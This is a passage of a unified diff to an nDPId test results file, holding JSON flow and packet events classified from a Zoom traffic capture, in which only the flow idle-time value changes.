{"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471189,"flow_last_seen":1569520471189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520471189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569520471189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520471189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGatnAqAF1bV6gY9ZXAbsw+fmWAAAAALAC\/\/9csgAAAgQFtAEDAwUBAQgKJZziLAAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569520471220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520471220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGd91tXqBjwKgBdQG71leHhddzMPn5l6ASqbBjhwAAAgQFrAQCCAp2KotLJZziLAEDAww="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569520471220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520471220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGauXAqAF1bV6gY9ZXAbsw+fmXh4XXdIAQECwrtgAAAQEICiWc4kt2KotL"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520471399,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEAA2VgAAAQEICiWc4viZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471189,"flow_last_seen":1569520471189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520471189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569520471189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520471189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGatnAqAF1bV6gY9ZXAbsw+fmWAAAAALAC\/\/9csgAAAgQFtAEDAwUBAQgKJZziLAAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569520471220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520471220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGd91tXqBjwKgBdQG71leHhddzMPn5l6ASqbBjhwAAAgQFrAQCCAp2KotLJZziLAEDAww="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569520471220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520471220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGauXAqAF1bV6gY9ZXAbsw+fmXh4XXdIAQECwrtgAAAQEICiWc4kt2KotL"} 
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569520471399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520471399,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEAA2VgAAAQEICiWc4viZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569520471748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471748,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHYY4AAEARSPnAqAF1bV6gY+PXImEAcwEfAQACfUZNNf\/9ojRJXQ1tO1HolgAAAAAAAAACAHoAKgB6ACoAAABADhc935YCXvuVxCQMI1O\/y\/Bgvpncu9jEece5cy1sdfpDYvCDXrg+TanGp+bzCbMeQN8Pa7V1aoQPcx2bwfanLQAAAAA="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 
@@ -175,38 +175,38 @@ 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466080,"flow_last_seen":1569520472536,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":796,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466080,"flow_last_seen":1569520472536,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":796,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 